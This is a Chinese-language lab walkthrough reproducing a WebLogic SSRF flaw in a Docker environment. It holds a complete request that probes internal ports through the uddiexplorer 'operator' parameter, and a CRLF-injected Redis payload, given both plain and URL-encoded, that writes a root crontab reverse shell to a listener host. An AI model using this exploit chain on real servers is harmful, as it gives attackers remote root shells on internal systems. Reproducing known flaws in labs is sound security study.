Weblogic SSRF漏洞
复现环境
复现过程
输入docker-compose up -d 进行环境的构建
访问http://192.168.61.143:7001/uddiexplorer
SSRF漏洞位于http://192.168.61.143:7001/uddiexplorer/SearchPublicRegistries.jsp
若访问的端口不开放则会出现“not connect over”内容提示
除了POST请求,GET请求也是可以的
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1 Host: 192.168.61.143:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=zFmmdFQbM54b4l88TpJhP2vP3QztD1XWh58xpL9X2QssM5vr3pGv!-1728212900 Upgrade-Insecure-Requests: 1
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.18.0.2:6379 which did not have a valid SOAP content-type: null.
(返回内容出现“Received a response” 也表示目标IP地址存在且端口开放)
注入HTTP头,利用Redis反弹shell
经过上面的探测发现内网的的redis服务器,我们通过HTTP注入来利用redis反弹shell
发送三条redis命令,将弹shell脚本写入/etc/crontab:
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.61.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab save
aaa
这里我用GET请求,所以还要进行URL编码
%74%65%73%74%0d%0a%0d%0a%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%36%31%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0d%0a%73%61%76%65%0d%0a%0d%0a%61%61%61
我们可以查看redis容器的/etc/crontab看到,我们的命令被成功写到crontab中去
我们可以查看redis容器的/etc/crontab看到,我们的命令被成功写到crontab中去
后记
2. 刚开始我看错了,把写入crontab提交到172.18.0.3:6379 问题是发现竟然也可以反弹shell,很奇怪。但是复现的图我重新编辑的时候弄没了